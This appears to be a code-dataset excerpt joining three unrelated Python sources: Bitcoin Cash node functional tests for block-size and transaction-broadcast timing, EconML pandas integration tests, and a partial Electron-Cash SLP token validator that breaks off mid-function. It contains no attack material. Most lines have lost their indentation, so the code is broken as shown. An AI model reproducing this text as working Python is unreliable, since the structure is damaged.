target_size = int(DEFAULT_EXCESSIVE_BLOCK_SIZE*0.67)
self.reinit_node(1, ["-excessiveblocksize=" + str(target_size)])
self.assert_case("when below DEFAULT_EXCESSIVE_BLOCK_SIZE", 1, target_size)
# When at lower boundary (1MB+1), but that requires blockmaxsize to be set to 1 MB as we're going below
# the default for max generated block size (2 MB)
target_size = ONE_MEGABYTE+1
self.reinit_node(1, ["-excessiveblocksize=" + str(target_size), "-blockmaxsize=" + str(ONE_MEGABYTE)])
self.assert_case("when at lower boundary (1MB+1)", 1, target_size)
        # When slightly above lower boundary (1MB+114) but still below the default for max generated block size
target_size = ONE_MEGABYTE+114
self.reinit_node(1, ["-excessiveblocksize=" + str(target_size), "-blockmaxsize=" + str(ONE_MEGABYTE)])
self.assert_case("when slightly above the lower boundary (1MB+114)", 1, target_size)
# When above the default max block size
target_size = int(DEFAULT_EXCESSIVE_BLOCK_SIZE*3.14)
self.reinit_node(1, ["-excessiveblocksize=" + str(target_size)])
self.assert_case("when above the DEFAULT_EXCESSIVE_BLOCK_SIZE", 1, target_size)
# When at the upper boundary
# can't start the node with upper_boundary as it will get OOM killed, so set it via rpc
self.reinit_node(1, [])
upper_boundary = (1 << 63) - 1
self.nodes[1].setexcessiveblock(upper_boundary)
self.assert_case("when at the upper boundary", 1, upper_boundary)
# When somewhere below upper boundary
target_size = int(upper_boundary*0.67)
self.nodes[1].setexcessiveblock(target_size)
self.assert_case("when somewhere below the upper boundary", 1, target_size)
# reset to default before exit
self.nodes[1].setexcessiveblock(DEFAULT_EXCESSIVE_BLOCK_SIZE)
if __name__ == '__main__':
GetBlockTemplateSigopsTest().main()
```
#### File: test/functional/bchn-txbroadcastinterval.py
```python
import time
from test_framework.mininode import P2PInterface, mininode_lock
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import wait_until, connect_nodes, disconnect_nodes
from scipy import stats
class InvReceiver(P2PInterface):
def __init__(self):
super().__init__()
self.invTimes = []
self.invDelays = []
def on_inv(self, message):
timeArrived = time.time()
        # If an inv contains more than one transaction, then the number of invs (== samplesize)
        # will be non-deterministic. This would be an error.
assert(len(message.inv) == 1)
self.invTimes.append(timeArrived)
if len(self.invTimes) > 1:
timediff = self.invTimes[-1] - self.invTimes[-2]
self.invDelays.append(timediff)
class TxBroadcastIntervalTest(BitcoinTestFramework):
# This test will have a node create a number of transactions and relay them
# to the mininode InvReceivers (one inbound and one outbound)
# according to test parameters.
# A third disconnected node is used only to create signed transactions
# The nodes are configured with "-txbroadcastrate=1" and
# "-excessiveblocksize=2000000" so that they relay at most one tx per inv
# It's convenient, because we can now define the exact number of invs
# (== sample size -1) that we want to send
# This holds true only for interval values <= 500 ms
# The mininode InvReceiver just listens and registers the delays between invs
# and constructs a sample array from these delays
# This sample is tested against a reference exponential distribution
# density with the same parameters with scipy.stats.kstest
# (See https://en.wikipedia.org/wiki/Kolmogorov%E2%80%93Smirnov_test)
    # The test is accepted if the delays sample resembles the reference
    # distribution -- more specifically, if the probability that the observed
    # delays could have arisen as a sample from the theoretical exponential
    # distribution is at least alpha (pvalue > alpha, default 0.001)
# There is one mininode that connects directly to the node that generates transactions.
# This tests the *inbound* connection interval.
# The first node creates an outbound connection to the second node,
# which relays the transactions instantly (-txbroadcastinterval=1)
# to the second mininode, which tests the *outbound* connection interval (= 1/2 of the inbound).
# (but is less reliable for small values of the -txbroadcastinterval)
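    # Illustrative sketch (not part of the test): the acceptance criterion used
    # below, applied to synthetic exponential data.
    #   from scipy import stats
    #   delays = stats.expon(scale=0.5).rvs(size=100)
    #   result = stats.kstest(delays, stats.expon(scale=0.5).cdf)
    #   assert result.pvalue > 0.001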
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument("--interval", dest="interval", type=int, default=500,
help="Set the average send interval in ms")
parser.add_argument("--samplesize", dest="samplesize", type=int, default=100,
help="Set the samplesize (number of inv message delays) for testing")
parser.add_argument("--testoutbound", dest="testoutbound", action="store_true",
help="Set whether to test outbound (along inbound) connection interval")
parser.add_argument("--alpha", dest="alpha", type=float, default="0.001",
help="Set a confidence threshold for the kstest")
def set_test_params(self):
self.scale = self.options.interval / 1000
self.num_nodes = 3
args = [
["-txbroadcastinterval={}".format(self.options.interval),
"-txbroadcastrate=1", "-excessiveblocksize=2000000",
"-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)],
["-txbroadcastinterval=1",
"-txbroadcastrate=1", "-excessiveblocksize=2000000",
"-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)],
["-limitancestorcount={}".format(self.options.samplesize+1),
"-limitdescendantcount={}".format(self.options.samplesize+1)]
]
self.extra_args = args
def setup_network(self):
self.setup_nodes()
connect_nodes(self.nodes[0], self.nodes[1])
connect_nodes(self.nodes[1], self.nodes[2])
# Generate enough coins on the spending nodes
self.nodes[2].generate(20 + 100)
self.sync_all()
# Disconnect node 3 so that it doesn't broadcast the txs it creates
disconnect_nodes(self.nodes[1], self.nodes[2])
self.signedtxs = []
to = self.nodes[2].getnewaddress()
for i in range(self.options.samplesize):
txid = self.nodes[2].sendtoaddress(to, "0.00001", "comment", "comment_to", False, 2)
self.signedtxs.append(self.nodes[2].gettransaction(txid)['hex'])
def run_test(self):
inboundReceiver, outboundReceiver = InvReceiver(), InvReceiver()
self.nodes[0].add_p2p_connection(inboundReceiver)
self.nodes[1].add_p2p_connection(outboundReceiver)
        for signedtx in self.signedtxs:
            self.nodes[0].sendrawtransaction(signedtx, True)
wait_until(
lambda: len(inboundReceiver.invTimes) == self.options.samplesize,
lock=mininode_lock,
timeout=self.options.samplesize * self.options.interval / 1000 * 2)
wait_until(
lambda: len(outboundReceiver.invTimes) == self.options.samplesize,
lock=mininode_lock,
timeout=self.options.samplesize * self.options.interval / 1000)
inboundkstestresult = stats.kstest(inboundReceiver.invDelays, stats.expon(scale=self.scale).cdf)
outboundkstestresult = stats.kstest(outboundReceiver.invDelays, stats.expon(scale=self.scale / 2).cdf)
self.log.info("kstestresults for interval {}: inbound {}, outbound {}".format(
self.options.interval,
inboundkstestresult,
outboundkstestresult))
assert(inboundkstestresult.pvalue > self.options.alpha), inboundReceiver.invDelays
if self.options.testoutbound:
assert(outboundkstestresult.pvalue > self.options.alpha), outboundReceiver.invDelays
if __name__ == '__main__':
TxBroadcastIntervalTest().main()
``` |
{
"source": "1Crazymoney/EconML",
"score": 2
} |
#### File: econml/tests/test_integration.py
```python
import numpy as np
import pandas as pd
import unittest
import pytest
import keras
import tensorflow as tf
from econml.drlearner import LinearDRLearner, SparseLinearDRLearner, ForestDRLearner
from econml.dml import LinearDML, SparseLinearDML, ForestDML
from econml.ortho_forest import DMLOrthoForest, DROrthoForest
from econml.sklearn_extensions.linear_model import WeightedLasso
from econml.metalearners import XLearner, SLearner, TLearner
from sklearn.ensemble import GradientBoostingRegressor, GradientBoostingClassifier
from sklearn.linear_model import LinearRegression, MultiTaskLasso, LassoCV
from econml.ortho_iv import LinearIntentToTreatDRIV
from econml.deepiv import DeepIVEstimator
class TestPandasIntegration(unittest.TestCase):
@classmethod
def setUpClass(cls):
np.random.seed(123)
# DGP constants
cls.n_controls = 10
cls.n_features = 2
cls.n = 100
# Define data features
        # Added `_df` to the names to be different from the default cate_estimator names
cls.controls = [f"W{i}_df" for i in range(cls.n_controls)]
cls.features = [f"X{i}_df" for i in range(cls.n_features)]
cls.instrument = ["Z0_df"]
cls.outcome = ["Y0_df"]
cls.cont_treat = ["T0_df"]
cls.bin_treat = ["T2_df"]
cls.cat_treat = ["T_cat"]
cls.cat_treat_labels = ["None", "One", "Two"]
cls.outcome_multi = ["Y0_df", "Y1_df"]
cls.cont_treat_multi = ["T0_df", "T1_df"]
# Generate data
d = {}
d.update({w: np.random.normal(size=cls.n) for w in cls.controls})
d.update({x: np.random.normal(size=cls.n) for x in cls.features})
d.update({t: np.random.uniform(size=cls.n) for t in cls.cont_treat_multi})
d.update({t: np.random.binomial(1, 0.5, size=cls.n) for t in cls.bin_treat})
d.update({t: np.random.choice(["None", "One", "Two"], size=cls.n, p=[0.4, 0.3, 0.3]) for t in cls.cat_treat})
d.update({z: np.random.binomial(1, 0.5, size=cls.n) for z in cls.instrument})
d.update({y: np.random.normal(size=cls.n) for y in cls.outcome_multi})
cls.df = pd.DataFrame(d)
def test_dml(self):
#################################
# Single treatment and outcome #
#################################
X = TestPandasIntegration.df[TestPandasIntegration.features]
W = TestPandasIntegration.df[TestPandasIntegration.controls]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.cont_treat]
# Test LinearDML
est = LinearDML(model_y=LassoCV(), model_t=LassoCV())
est.fit(Y, T, X=X, W=W, inference='statsmodels')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary()) # Check that names propagate as expected
# Test re-fit
X1 = X.rename(columns={c: "{}_1".format(c) for c in X.columns})
est.fit(Y, T, X=X1, W=W, inference='statsmodels')
self._check_input_names(est.summary(), feat_comp=X1.columns)
# Test SparseLinearDML
est = SparseLinearDML(model_y=LassoCV(), model_t=LassoCV())
est.fit(Y, T, X=X, W=W, inference='debiasedlasso')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary()) # Check that names propagate as expected
# ForestDML
est = ForestDML(model_y=GradientBoostingRegressor(), model_t=GradientBoostingRegressor())
est.fit(Y, T, X=X, W=W, inference='blb')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
####################################
        # Multiple treatments and outcomes #
####################################
Y = TestPandasIntegration.df[TestPandasIntegration.outcome_multi]
T = TestPandasIntegration.df[TestPandasIntegration.cont_treat_multi]
# Test LinearDML
est = LinearDML(model_y=MultiTaskLasso(), model_t=MultiTaskLasso())
est.fit(Y, T, X=X, W=W, inference='statsmodels')
self._check_input_names(est.summary(), True, True) # Check that names propagate as expected
self._check_popsum_names(est.effect_inference(X).population_summary(), True)
est.fit(Y, T, X=X, W=W, inference='bootstrap') # Check bootstrap as well
self._check_input_names(est.summary(), True, True)
self._check_popsum_names(est.effect_inference(X).population_summary(), True)
# Test SparseLinearDML
est = SparseLinearDML(model_y=MultiTaskLasso(), model_t=MultiTaskLasso())
est.fit(Y, T, X=X, W=W, inference='debiasedlasso')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary(), True, True) # Check that names propagate as expected
self._check_popsum_names(est.effect_inference(X).population_summary(), True)
def test_orf(self):
# Single outcome only, ORF does not support multiple outcomes
X = TestPandasIntegration.df[TestPandasIntegration.features]
W = TestPandasIntegration.df[TestPandasIntegration.controls]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.cont_treat]
# Test DMLOrthoForest
est = DMLOrthoForest(
n_trees=100, max_depth=2, model_T=WeightedLasso(), model_Y=WeightedLasso())
est.fit(Y, T, X=X, W=W, inference='blb')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_popsum_names(est.effect_inference(X).population_summary())
# Test DROrthoForest
est = DROrthoForest(n_trees=100, max_depth=2)
T = TestPandasIntegration.df[TestPandasIntegration.bin_treat]
est.fit(Y, T, X=X, W=W, inference='blb')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_popsum_names(est.effect_inference(X).population_summary())
def test_metalearners(self):
X = TestPandasIntegration.df[TestPandasIntegration.features]
W = TestPandasIntegration.df[TestPandasIntegration.controls]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.bin_treat]
# Test XLearner
# Skipping population summary names test because bootstrap inference is too slow
est = XLearner(models=GradientBoostingRegressor(),
propensity_model=GradientBoostingClassifier(),
cate_models=GradientBoostingRegressor())
est.fit(Y, T, X=np.hstack([X, W]))
treatment_effects = est.effect(np.hstack([X, W]))
# Test SLearner
est = SLearner(overall_model=GradientBoostingRegressor())
est.fit(Y, T, X=np.hstack([X, W]))
treatment_effects = est.effect(np.hstack([X, W]))
# Test TLearner
est = TLearner(models=GradientBoostingRegressor())
est.fit(Y, T, X=np.hstack([X, W]))
treatment_effects = est.effect(np.hstack([X, W]))
def test_drlearners(self):
X = TestPandasIntegration.df[TestPandasIntegration.features]
W = TestPandasIntegration.df[TestPandasIntegration.controls]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.bin_treat]
# Test LinearDRLearner
est = LinearDRLearner(model_propensity=GradientBoostingClassifier(),
model_regression=GradientBoostingRegressor())
est.fit(Y, T, X=X, W=W, inference='statsmodels')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary(T=1))
self._check_popsum_names(est.effect_inference(X).population_summary())
# Test SparseLinearDRLearner
est = SparseLinearDRLearner(model_propensity=GradientBoostingClassifier(),
model_regression=GradientBoostingRegressor())
est.fit(Y, T, X=X, W=W, inference='debiasedlasso')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary(T=1))
self._check_popsum_names(est.effect_inference(X).population_summary())
# Test ForestDRLearner
est = ForestDRLearner(model_propensity=GradientBoostingClassifier(),
model_regression=GradientBoostingRegressor())
est.fit(Y, T, X=X, W=W, inference='blb')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_popsum_names(est.effect_inference(X).population_summary())
def test_orthoiv(self):
X = TestPandasIntegration.df[TestPandasIntegration.features]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.bin_treat]
Z = TestPandasIntegration.df[TestPandasIntegration.instrument]
# Test LinearIntentToTreatDRIV
est = LinearIntentToTreatDRIV(model_Y_X=GradientBoostingRegressor(),
model_T_XZ=GradientBoostingClassifier(),
flexible_model_effect=GradientBoostingRegressor())
est.fit(Y, T, Z=Z, X=X, inference='statsmodels')
treatment_effects = est.effect(X)
lb, ub = est.effect_interval(X, alpha=0.05)
self._check_input_names(est.summary()) # Check input names propagate
self._check_popsum_names(est.effect_inference(X).population_summary())
def test_deepiv(self):
X = TestPandasIntegration.df[TestPandasIntegration.features]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.cont_treat]
Z = TestPandasIntegration.df[TestPandasIntegration.instrument]
# Test DeepIV
treatment_model = keras.Sequential([keras.layers.Dense(128, activation='relu', input_shape=(3,)),
keras.layers.Dropout(0.17),
keras.layers.Dense(64, activation='relu'),
keras.layers.Dropout(0.17),
keras.layers.Dense(32, activation='relu'),
keras.layers.Dropout(0.17)])
response_model = keras.Sequential([keras.layers.Dense(128, activation='relu', input_shape=(3,)),
keras.layers.Dropout(0.17),
keras.layers.Dense(64, activation='relu'),
keras.layers.Dropout(0.17),
keras.layers.Dense(32, activation='relu'),
keras.layers.Dropout(0.17),
keras.layers.Dense(1)])
        est = DeepIVEstimator(n_components=10,  # number of Gaussians in the mixture density network
m=lambda z, x: treatment_model(keras.layers.concatenate([z, x])), # Treatment model
h=lambda t, x: response_model(keras.layers.concatenate([t, x])), # Response model
n_samples=1 # Number of samples used to estimate the response
)
est.fit(Y, T, X=X, Z=Z)
treatment_effects = est.effect(X)
def test_cat_treatments(self):
X = TestPandasIntegration.df[TestPandasIntegration.features]
Y = TestPandasIntegration.df[TestPandasIntegration.outcome]
T = TestPandasIntegration.df[TestPandasIntegration.cat_treat]
# Test categorical treatments
est = LinearDML(discrete_treatment=True, linear_first_stages=False,
categories=TestPandasIntegration.cat_treat_labels)
est.fit(Y, T, X=X)
self._check_input_names(est.summary(), T_cat=True)
treat_name = "Category"
self._check_input_names(est.summary(treatment_names=[treat_name]), T_cat=True, treat_comp=[
f"{treat_name}_{t}" for t in TestPandasIntegration.cat_treat_labels[1:]])
# Check refit
est.fit(Y, T, X=X)
self._check_input_names(est.summary(), T_cat=True)
# Check refit after setting categories
est.categories = [f"{t}_1" for t in TestPandasIntegration.cat_treat_labels]
T = T.apply(lambda t: t + "_1")
est.fit(Y, T, X=X)
self._check_input_names(est.summary(), T_cat=True, treat_comp=[
f"{TestPandasIntegration.cat_treat[0]}_{t}_1" for t in
TestPandasIntegration.cat_treat_labels[1:]])
def _check_input_names(self, summary_table,
Y_multi=False, T_multi=False, T_cat=False, feat_comp=None, treat_comp=None):
index_name = np.array(summary_table.tables[0].data)[1:, 0]
if feat_comp is None:
feat_comp = TestPandasIntegration.features
if treat_comp is None:
if T_multi:
treat_comp = TestPandasIntegration.cont_treat_multi
if T_cat:
treat_comp = ["{}_{}".format(TestPandasIntegration.cat_treat[0], label)
for label in TestPandasIntegration.cat_treat_labels[1:]]
if Y_multi:
out_comp = TestPandasIntegration.outcome_multi
if T_cat or T_multi:
index_name_comp = [
f"{feat}|{outcome}|{treat}" for feat in feat_comp for outcome in out_comp for treat in treat_comp]
else:
index_name_comp = [
f"{feat}|{outcome}" for feat in feat_comp for outcome in out_comp]
else:
if T_cat or T_multi:
index_name_comp = [
f"{feat}|{treat}" for feat in feat_comp for treat in treat_comp]
else:
index_name_comp = feat_comp
np.testing.assert_array_equal(index_name, index_name_comp)
def _check_popsum_names(self, popsum, Y_multi=False):
np.testing.assert_array_equal(popsum.output_names,
TestPandasIntegration.outcome_multi if Y_multi
else TestPandasIntegration.outcome)
``` |
{
"source": "1Crazymoney/Electron-Cash-SLP",
"score": 2
} |
#### File: Electron-Cash-SLP/lib/slp_validator_0x01.py
```python
import threading
import queue
from typing import Tuple, List
import weakref
from .transaction import Transaction
from .simple_config import get_config
from . import slp
from .slp import SlpMessage, SlpParsingError, SlpUnsupportedSlpTokenType, SlpInvalidOutputMessage
from .slp_dagging import TokenGraph, ValidationJob, ValidationJobManager, ValidatorGeneric
from .bitcoin import TYPE_SCRIPT
from .util import print_error, PrintError
from . import slp_proxying # loading this module starts a thread.
from .slp_graph_search import SlpGraphSearchManager # thread is started upon instantiation
class GraphContext(PrintError):
''' Instance of the DAG cache. Uses a single per-instance
ValidationJobManager to validate SLP tokens if is_parallel=False.
If is_parallel=True, will create 1 job manager (thread) per tokenid it is
validating. '''
def __init__(self, name='GraphContext', is_parallel=False):
# Global db for shared graphs (each token_id_hex has its own graph).
self.graph_db_lock = threading.Lock()
self.graph_db = dict() # token_id_hex -> TokenGraph
self.is_parallel = is_parallel
self.job_mgrs = weakref.WeakValueDictionary() # token_id_hex -> ValidationJobManager (only used if is_parallel, otherwise self.job_mgr is used)
self.name = name
self.graph_search_mgr = SlpGraphSearchManager()
self._setup_job_mgr()
def diagnostic_name(self):
return self.name
def _setup_job_mgr(self):
if self.is_parallel:
self.job_mgr = None
else:
self.job_mgr = self._new_job_mgr()
def _new_job_mgr(self, suffix='') -> ValidationJobManager:
ret = ValidationJobManager(threadname=f'{self.name}/ValidationJobManager{suffix}', exit_when_done=self.is_parallel)
weakref.finalize(ret, print_error, f'[{ret.threadname}] finalized') # track object lifecycle
return ret
def _get_or_make_mgr(self, token_id_hex: str) -> ValidationJobManager:
''' Helper: This must be called with self.graph_db_lock held.
Creates a new job manager for token_id_hex if is_parallel=True and one
doesn't already exist, and returns it.
Returns self.job_mgr if is_parallel=False. '''
job_mgr = self.job_mgr or self.job_mgrs.get(token_id_hex) or self._new_job_mgr(token_id_hex[:4])
if job_mgr is not self.job_mgr:
# was an is_parallel setup
assert not self.job_mgr and self.is_parallel and job_mgr
self.job_mgrs[token_id_hex] = job_mgr
return job_mgr
def get_graph(self, token_id_hex) -> Tuple[TokenGraph, ValidationJobManager]:
''' Returns an existing or new graph for a particular token.
A new job manager is created for that token if self.is_parallel=True,
otherwise the shared job manager is used.'''
with self.graph_db_lock:
try:
return self.graph_db[token_id_hex], self._get_or_make_mgr(token_id_hex)
except KeyError:
pass
val = Validator_SLP1(token_id_hex)
graph = TokenGraph(val)
self.graph_db[token_id_hex] = graph
return graph, self._get_or_make_mgr(token_id_hex)
def kill_graph(self, token_id_hex):
''' Reset a graph. This will stop all the jobs for that token_id_hex. '''
with self.graph_db_lock:
try:
graph = self.graph_db.pop(token_id_hex)
job_mgr = self.job_mgrs.pop(token_id_hex, None)
except KeyError:
return
if job_mgr:
assert job_mgr is not self.job_mgr
job_mgr.kill()
elif self.job_mgr:
# todo: see if we can put this in the above 'with' block (while
# holding locks). I was hesitant to do so for fear of deadlocks.
self.job_mgr.stop_all_with_txid(token_id_hex)
graph.reset()
def kill(self):
''' Kills all jobs and resets this instance to the state it had
when freshly constructed '''
with self.graph_db_lock:
for token_id_hex, graph in self.graph_db.items():
graph.reset()
job_mgr = self.job_mgrs.pop(token_id_hex, None)
if job_mgr: job_mgr.kill()
self.graph_db.clear()
self.job_mgrs.clear()
if self.job_mgr:
self.job_mgr.kill()
self._setup_job_mgr() # re-create a new, clean instance, if needed
def setup_job(self, tx, reset=False) -> Tuple[TokenGraph, ValidationJobManager]:
""" Perform setup steps before validation for a given transaction. """
slpMsg = SlpMessage.parseSlpOutputScript(tx.outputs()[0][1])
if slpMsg.transaction_type == 'GENESIS':
token_id_hex = tx.txid_fast()
elif slpMsg.transaction_type in ('MINT', 'SEND'):
token_id_hex = slpMsg.op_return_fields['token_id_hex']
else:
return None
if reset and not self.is_parallel:
try:
self.kill_graph(token_id_hex)
except KeyError:
pass
graph, job_mgr = self.get_graph(token_id_hex)
return graph, job_mgr
@staticmethod
def get_validation_config():
config = get_config()
try:
limit_dls = config.get('slp_validator_download_limit', None)
limit_depth = config.get('slp_validator_depth_limit', None)
proxy_enable = config.get('slp_validator_proxy_enabled', False)
except NameError: # in daemon mode (no GUI) 'config' is not defined
limit_dls = None
limit_depth = None
proxy_enable = False
return limit_dls, limit_depth, proxy_enable
@staticmethod
def get_gs_config():
config = get_config()
try:
gs_enable = config.get('slp_validator_graphsearch_enabled', False)
gs_host = config.get('slp_gs_host', None)
except NameError: # in daemon mode (no GUI) 'config' is not defined
gs_enable = False
gs_host = None
return gs_enable, gs_host
def make_job(self, tx, wallet, network, *, debug=False, reset=False, callback_done=None, **kwargs) -> ValidationJob:
"""
Basic validation job maker for a single transaction.
Creates job and starts it running in the background thread.
Returns job, or None if it was not a validatable type.
Note that the app-global 'config' object from simpe_config should be
defined before this is called.
"""
limit_dls, limit_depth, proxy_enable = self.get_validation_config()
try:
graph, job_mgr = self.setup_job(tx, reset=reset)
except (SlpParsingError, IndexError):
return
txid = tx.txid_fast()
num_proxy_requests = 0
proxyqueue = queue.Queue()
def proxy_cb(txids, results):
newres = {}
# convert from 'true/false' to (True,1) or (False,3)
for t,v in results.items():
if v:
newres[t] = (True, 1)
else:
newres[t] = (True, 3)
proxyqueue.put(newres)
first_fetch_complete = False
def fetch_hook(txids, val_job):
l = []
gs_enable, gs_host = self.get_gs_config()
network.slp_gs_host = gs_host
nonlocal first_fetch_complete
if gs_enable \
and gs_host \
and self.graph_search_mgr \
and not val_job.graph_search_job:
if val_job.root_txid in self.graph_search_mgr.search_jobs.keys() \
and self.graph_search_mgr.search_jobs[val_job.root_txid].job_complete \
and not self.graph_search_mgr.search_jobs[val_job.root_txid].search_success:
self.graph_search_mgr.search_jobs.pop(val_job.root_txid)
search_job = self.graph_search_mgr.new_search(val_job)
val_job.graph_search_job = search_job if search_job else None
elif not gs_enable and self.graph_search_mgr:
for job in self.graph_search_mgr.search_jobs.values():
job.sched_cancel()
if network.slp_validation_fetch_signal and not first_fetch_complete:
network.slp_validation_fetch_signal.emit(0)
first_fetch_complete = True
for txid in txids:
if val_job.graph_search_job:
txn = val_job.graph_search_job.get_tx(txid)
if txn:
l.append(txn)
else:
try:
l.append(wallet.transactions[txid])
except KeyError:
pass
return l
def done_callback(job):
# wait for proxy stuff to roll in
results = {}
try:
for _ in range(num_proxy_requests):
r = proxyqueue.get(timeout=5)
results.update(r)
except queue.Empty:
pass
if proxy_enable:
graph.finalize_from_proxy(results)
# Do consistency check here
# XXXXXXX
# Save validity
for t,n in job.nodes.items():
val = n.validity
if val != 0:
wallet.slpv1_validity[t] = val
job = ValidationJob(graph, txid, network,
fetch_hook=fetch_hook,
validitycache=wallet.slpv1_validity,
download_limit=limit_dls,
depth_limit=limit_depth,
debug=debug, ref=wallet,
**kwargs)
job.add_callback(done_callback)
job_mgr.add_job(job)
return job
def stop_all_for_wallet(self, wallet, timeout=None) -> List[ValidationJob]:
''' Stops all extant jobs for a particular wallet. This method is
intended to be called on wallet close so that all the work that
particular wallet enqueued can get cleaned up. This method properly
supports both is_parallel and single mode. Will return all the jobs
that matched as a list or the empty list if no jobs matched.
Optional arg timeout, if not None and positive, will make this function
wait for the jobs to complete for up to timeout seconds per job.'''
jobs = []
if self.job_mgr:
# single job manager mode
jobs = self.job_mgr.stop_all_for(wallet)
else:
# multi job-manager mode, iterate over all extant job managers
with self.graph_db_lock:
for txid, job_mgr in dict(self.job_mgrs).items():
jobs += job_mgr.stop_all_for(wallet)
if timeout is not None and timeout > 0:
for job in jobs:
if job.running:
job.exited.wait(timeout=timeout) or self.print_error(f"Warning: Job {job} wait timed out (timeout={timeout})")
return jobs
# App-wide instance. Wallets share the results of the DAG lookups.
# This instance is shared so that we don't redundantly verify tokens for each
# wallet, but rather do it app-wide. Note that when wallet instances close
# while a verification is in progress, all extant jobs for that wallet are
# stopped -- ultimately stopping the entire DAG lookup for that token if all
# wallets verifying a token are closed. The next time a wallet containing that
# token is opened, however, the validation continues where it left off.
shared_context = GraphContext(is_parallel=False) # <-- Set is_parallel=True if you want 1 thread per token (tokens validate in parallel). Otherwise there is 1 validator thread app-wide and tokens validate in series.
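# Usage sketch (assumption): a wallet-facing caller would typically run
#   job = shared_context.make_job(tx, wallet, network)
# and, on wallet close,
#   shared_context.stop_all_for_wallet(wallet)
# with results accumulating in wallet.slpv1_validity as jobs complete.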
class Validator_SLP1(ValidatorGeneric):
prevalidation = True # indicate we want to check validation when some inputs still active.
validity_states = {
0: 'Unknown',
1: 'Valid',
2: 'Invalid: not SLP / malformed SLP',
3: 'Invalid: insufficient valid inputs',
4: 'Invalid: token type different than required'
}
def __init__(self, token_id_hex, *, enforced_token_type=1):
self.token_id_hex = token_id_hex
self.token_type = enforced_token_type
def get_info(self, tx, *, diff_testing_mode=False):
"""
Enforce internal consensus rules (check all rules that don't involve
information from inputs).
Prune if mismatched token_id_hex from this validator or SLP version other than 1.
diff_testing_mode, allows None for token_type and token_id_hex for fuzzer testing
"""
txouts = tx.outputs()
if len(txouts) < 1:
return ('prune', 2) # not SLP -- no outputs!
# We take for granted that parseSlpOutputScript here will catch all
# consensus-invalid op_return messages. In this procedure we check the
# remaining internal rules, having to do with the overall transaction.
try:
slpMsg = SlpMessage.parseSlpOutputScript(txouts[0][1])
except SlpUnsupportedSlpTokenType as e:
# for unknown types: pruning as unknown has similar effect as pruning
# invalid except it tells the validity cacher to not remember this
# tx as 'bad'
return ('prune', 0)
except SlpInvalidOutputMessage as e:
return ('prune', 2)
# Parse the SLP
if slpMsg.token_type not in [1,129]:
return ('prune', 0)
# Check that the correct token_type is enforced (type 0x01 or 0x81)
if diff_testing_mode and self.token_type is not None and self.token_type != slpMsg.token_type:
return ('prune', 4)
elif not diff_testing_mode and self.token_type != slpMsg.token_type:
return ('prune', 4)
if slpMsg.transaction_type == 'SEND':
token_id_hex = slpMsg.op_return_fields['token_id_hex']
# need to examine all inputs
vin_mask = (True,)*len(tx.inputs())
# myinfo is the output sum
# Note: according to consensus rules, we compute sum before truncating extra outputs.
# print("DEBUG SLP:getinfo %.10s outputs: %r"%(tx.txid(), slpMsg.op_return_fields['token_output']))
myinfo = sum(slpMsg.op_return_fields['token_output'])
# outputs straight from the token amounts
outputs = slpMsg.op_return_fields['token_output']
elif slpMsg.transaction_type == 'GENESIS':
token_id_hex = tx.txid_fast()
vin_mask = (False,)*len(tx.inputs()) # don't need to examine any inputs.
myinfo = 'GENESIS'
# place 'MINT' as baton signifier on the designated output
mintvout = slpMsg.op_return_fields['mint_baton_vout']
if mintvout is None:
outputs = [None,None]
else:
outputs = [None]*(mintvout) + ['MINT']
outputs[1] = slpMsg.op_return_fields['initial_token_mint_quantity']
elif slpMsg.transaction_type == 'MINT':
token_id_hex = slpMsg.op_return_fields['token_id_hex']
vin_mask = (True,)*len(tx.inputs()) # need to examine all vins, even for baton.
myinfo = 'MINT'
# place 'MINT' as baton signifier on the designated output
mintvout = slpMsg.op_return_fields['mint_baton_vout']
if mintvout is None:
outputs = [None,None]
else:
outputs = [None]*(mintvout) + ['MINT']
outputs[1] = slpMsg.op_return_fields['additional_token_quantity']
elif slpMsg.transaction_type == 'COMMIT':
return ('prune', 0)
if diff_testing_mode and self.token_id_hex is not None and token_id_hex != self.token_id_hex:
return ('prune', 0) # mismatched token_id_hex
elif not diff_testing_mode and token_id_hex != self.token_id_hex:
return ('prune', 0)
# truncate / expand outputs list to match tx outputs length
outputs = tuple(outputs[:len(txouts)])
outputs = outputs + (None,)*(len(txouts) - len(outputs))
return vin_mask, myinfo, outputs
def check_needed(self, myinfo, out_n):
if myinfo == 'MINT':
# mints are only interested in the baton input
return (out_n == 'MINT')
if myinfo == 'GENESIS':
# genesis shouldn't have any parents, so this should not happen.
raise RuntimeError('Unexpected', out_n)
# TRAN txes are only interested in integer, non-zero input contributions.
if out_n is None or out_n == 'MINT':
return False
else:
return (out_n > 0)
def validate(self, myinfo, inputs_info):
if myinfo == 'GENESIS':
if len(inputs_info) != 0:
raise RuntimeError('Unexpected', inputs_info)
return (True, 1) # genesis is always valid.
elif myinfo == 'MINT':
